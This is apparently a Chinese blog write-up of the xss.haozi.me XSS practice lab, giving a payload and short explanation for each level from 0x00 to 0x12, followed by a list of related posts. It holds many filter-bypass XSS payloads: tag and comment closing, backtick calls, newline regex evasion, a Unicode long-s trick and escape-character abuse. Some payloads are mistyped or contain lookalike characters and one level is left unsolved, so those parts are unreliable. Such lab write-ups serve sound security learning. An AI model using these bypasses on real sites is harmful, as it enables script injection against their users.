XSS表情包靶场通关记录
平台
alert(1)https://xss.haozi.me
0X00
源码无防护,直接常规payload绕过
<script>alert(1)</script>
<svgonlad=alert(1)>
0x01
可以看到注入点是在<textarea></textarea>标签中,想要成功注入的话,就需要我们主动去构造标签,通过闭合<textarea></textarea>,即可注入成功。
</textarea><script>alert(1)</script>'
00x02
"><script>alert(1)</script>
0x03
我们通过本关服务端源码,我们可以发现圆括号、方括号都被过滤了,是我们可以用反单引号来代替。
<script>alert`1`</script>
0x04
这一关通过查看源代码可以发现圆括号、正括号和引号都被过滤,但是我们可以使用html编码来绕过。
<svg><script>alert(1)</script>
0X05
注入点出于注释符之间,而注释符的后半部分被替换为一个笑脸,而防止了注释被闭合。我们需要知道两种注释方式,分别为:
1.<!-- 注释内容 -->
2.<! -- 注释内容 --!>
所以我们采用第二种方式过关。
--!><script>alert(1)</script>
0X06
查看网页源代码发现使用了正则表达式来过滤,分析regex 表达式/auto|on.*=|>/ig,它匹配了auto、及以on开头的且以=结尾的字符串,所以过滤了autofocus和onerror等时间,以及防止input标签被闭合,但是它并没有匹配换行符,可以通过使用换行来绕过匹配。
1 type="image" src="" onerror 2 3 =alert(1)
0X07
<img src="" οnerrοr="alert(1)"
0X08
换行绕过正则
</style
>
<script>alert(1)</script>
0X09
let语句声明一个块级作用域的本地变量,并且可选的将其初始化为一个值。
test() 方法执行一个检索,用来查看正则表达式与指定的字符串是否匹配,返回true或false。正则表达式白名单式地匹配了固定地址,并闭合前面的标签。
https://www.segmentfault.com/"></script><img src=""
οnerrοr=alert(1)<"
0x0A
可以看出过滤了& ` " < > \ ,之后再正则白名单匹配。通过html转义,把能注入的关键字都过滤掉,可以直接引用指定网站下的目录文件来达到xss注入的目的。
比如:在靶场的目录下有个j.js文件,里面有alert(1);代码,直接调用即可(此方法目前已经失效):
这关没过去,有知道的同志麻烦评论告知一下!多谢
0x0B
html字符 ,js进行hex编码绕过
可以看出服务器端,将所有字母转换为大写
HTML中对大小写不敏感,JS中对大小写不敏感。
这样可以对JS代码进行hex编码处理,而html部分不变
编码结果类型是html ectities。
比如:
a->a
l->l
<img src="" οnerrοr=alert(1)>
域名对大小写也不敏感,所以可以用上一题的方法,调用靶机上自带的j.js代码,完成,xss注入:
<script src=https://www.segmentfault.com.haozi.me/j.js></script>
0X0C
该题将/script/替换为空之后,再转为大写。可以按照上题的解法
<img src="" οnerrοr=alert(1)>
0X0D
回车绕过,JS注释符 -->
该题把斜杠, 单、双引号都过滤了; 回车可以破坏注释结构,js的注释符-->
可以注释掉后面的内容。
0X0E
找一个大写是s的拉丁字符,编码绕过大写
这题会把标签内的内容替换,字母都变大写,前面添加一个_。
这几乎过滤了所有的标签,包括<script>
逆向思维,找到一个字符的大写是s的
<ſcript src="" οnerrοr=alert(1)></script>
0X0F
注释符绕过
该题目对字符进行了html实体编码处理,但是,它忽略了一点,由于编码后处于html标签中,所以当解析代码时。被过滤编码的字符仍然会被还原来执行。所以可以说,被过滤的字符可以用。注入使其闭合,在注释掉后面的内容即可:
');alert(1); //
0X10
提供任意值
没有过滤,随意给window.date一个值,比如空值' ',再注入:
' ' ;alert(1);
0X11
注释符绕过
看到有一些字符被转义了, 包括换行符\n
等也被转义了
虽然被转义成了\/\/
, 但转义之后还是//
, 在js中还是注释符 (勿与正则弄混)
");alert(1);//
"); alert("1
0X12
转义符绕过
该题将双引号替换。无法闭合。 但是, 它并没有将转义符转义, 那么我们可以使用转义符转义,这样双引号就不会被替换:
\");alert(1);//
XSS表情包靶场通关记录相关推荐
- Pikachu靶场通关记录(详细)
Pikachu靶场通关记录 0x01 靶场介绍 Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞. 如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么 ...
- Qt 实现聊天软件中自定义表情包(随笔记录)
简述: QT实现自定义表情包,通过对(能够设置表情的行列数 , 表情的大小,表情的个数.最大行数等) 效果: 代码如下: EmoticonsWidget主要实现表情包窗口. EmoticonsWidg ...
- pikachu靶场通关记录
暴力破解 基于表单的暴力破解 看到登录表单,先随便输入用Burpsuite抓包试试 看到数据包中账号密码 试试进行暴力破解 把数据包大送到intruder模块,选择Cluster bomb 分别选择账 ...
- HackTheBox-BountyHunter靶场通关记录
文章目录 HackTheBox-BountyHunter靶场 准备工作 信息搜集 漏洞利用 提权 HackTheBox-BountyHunter靶场 准备工作 打开hackthebox并找到bount ...
- webgoat靶场通关记录
webgoat靶场的所有的源码审计 以及详细解析 想要打靶场的可以看想要,学习java代码基础的也可以看看 github项目地址 https://github.com/wanan0red/webgoa ...
- wechall靶场training系列通关记录
wechall靶场Training系列通关记录 Training: Get Sourced 第一题很简单,获取藏在网页源代码中的密码.F12查看网页中的注释即可找到答案: Training: Steg ...
- vulntarget-b靶场详细通关记录
vulntarget-b靶场详细通关记录 前言 这个靶场打了好几天才打下来,在上线msf和免杀过火绒还有psexec横向移动中卡了很久.而且这个靶场的通关资料较少,吐槽一下网上的相关文章很多关键步骤都 ...
- 记录 | PC端微信无法加载头像和表情包的解决
目录 问题描述 解决 问题描述 换了一台新的电脑,登录微信后发现无法加载表情包和头像 解决 参考了如下链接:https://developers.weixin.qq.com/community/dev ...
- 攻防系列——pikachu靶场通关练习
目录 一.暴力破解 Burte Force(暴力破解)概述 (一)基于表单的暴力破解 (二)验证码绕过(on server) (三)验证码绕过(on client) (四)token 防爆破 二.Cr ...
最新文章
- H极大值—lhMorpHMax
- python基础实例-Python入门基础知识实例,
- shell之case和循环语句(case语句的格式与举例)(for循环,while循环until循环语句的详解和continue,break解释, 九九乘法口诀表 ,等腰三角形)
- 三菱880彩铅和uni的区别_【彩铅基础】水溶性彩铅是什么?
- mysql中select后接数字_MySQL SELECT用于从一组数字中排列一个数字
- [JAVA]定时任务之-Quartz使用篇
- java把abcedf字符串进行排序_字符串合并处理 - 一贱书生的个人空间 - OSCHINA - 中文开源技术交流社区...
- 基于catia活塞的有限元分析_渐开线插齿刀自动化设计系统及有限元分析
- 从git仓库获取源码_微软开源Scalar,提升操作巨型Git仓库的速度
- R6300V2 从 DD-WRT 回刷恢复 官方原厂固件 DD-WRT to R6300V2
- PS 使用批处理来另存为图片
- TMS570-3-RTI中断
- 国际象棋渲染测试软件,测试了五款软件八款游戏:AMD三代锐龙YES!但游戏英特尔略胜一筹...
- synchronized,并发安全的守护神
- java实现can通信_[MicroPython]TPYBoard v102 CAN总线通信
- 指纹图像方向图matlab,基于Matlab实现的指纹图像细节特征提取
- 桌面图标有阴影,教给你怎么去掉
- python实现字符串类型 str 转换为 list 类型(unicode 转换为 list)
- c语言变量使用范围,C语言变量的基本使用
- webp转换工具cwebp